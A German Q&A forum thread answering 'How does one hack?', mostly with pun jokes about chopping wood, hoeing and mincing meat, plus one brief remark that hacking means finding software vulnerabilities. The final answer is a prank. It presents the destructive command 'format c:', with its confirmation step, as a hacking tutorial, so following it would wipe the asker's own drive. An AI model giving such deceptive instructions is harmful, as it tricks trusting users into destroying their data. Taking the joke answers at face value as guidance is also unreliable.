Wie hackt man?

7 Antworten

man sucht sicherheitslücken einer software. Das ist immer unterschiedlich, je nach produkt

Du holst dir eine Axt aus dem Baumarkt und dann hackst du damit drauf los. Einfach auf dein Zielobjekt schlagen.

Nimm Axt und Hauklotz. Stelle ein Scheit auf den Hauklotz und versuche es mit der Axtklinge zu treffen. Mit etwas Übung klappt das ganz gut.

Nimm eine Blatthacke und ziehe mit der Klinge knapp unter der Erdoberfläche entlang, besonders dort, wo unerwünschtes Kraut wächst oder die Bodenoberfläche verhärtet ist.

Für Hackfleisch tue das auf Gulaschbrocken vorgeschnittene Fleisch in den Fleischwolf und drehe die Kurbel. Verwende ersatzweise einen Cutter statt des Fleischwolfes.

Nachdem Du Windows gestartet hast, rufe die "DOS-Eingabe-Aufforderung" auf. Tippe in dem schwarzen Fenster den Befehl format c: ein und drücke ENTER oder RETURN. Du wirst jetzt gefragt, ob Du wirklich hacken willst. Tippe Y und drücke ENTER oder RETURN. Jetzt hackst Du besser als Anonymous es je gemacht hat.